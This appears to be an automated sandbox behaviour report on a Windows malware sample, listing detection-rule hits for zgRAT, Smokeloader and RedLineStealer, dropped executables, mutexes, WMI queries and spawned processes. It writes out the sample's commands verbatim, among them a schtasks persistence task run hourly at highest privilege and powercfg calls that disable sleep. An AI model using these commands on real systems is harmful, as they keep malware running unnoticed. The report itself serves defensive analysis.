Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000000.1340413535.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemazda.exe0 vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1345777835.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.000000000420F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePDFReader.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePE.dll& vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Ca01BQGh9DxiBOJwup.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Ca01BQGh9DxiBOJwup.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@93/120@15/20

Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe

Code function: 8_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

8_2_00409448

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe

Code function: 12_2_026D04FA CreateToolhelp32Snapshot,Module32First,

12_2_026D04FA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00433600 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,VariantClear,CoUninitialize,

2_2_00433600

Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe

Code function: 8_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,

8_2_00409C34

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\KejwopdnfWW_15
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:748:120:WilError_03
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerEExpert
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7888
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_03

Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe

File created: C:\Users\user\AppData\Local\Temp\is-3I532.tmp

Jump to behavior

Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe

File opened: C:\Windows\system32\d8235ff2bb755597b25d1e3a31c849fdea11f313e641bb18fed09c49fcebd4b5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Program Files (x86)\desktop.ini

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1930485208.00000000031EC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	ReversingLabs: Detection: 71%
Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Virustotal: Detection: 42%

Source: kvOccCLzMNloI4W4GuGOaRuh.exe	String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
Source: v7u3knm8W6_1U6jDWPH31qsx.exe	String found in binary or memory: /addr_imp

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Process created: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp "C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp" /SL5="$20408,2877196,56832,C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process created: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe "C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe" -i
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe "C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe"
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Process created: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp "C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp" /SL5="$20408,2877196,56832,C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe "C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888
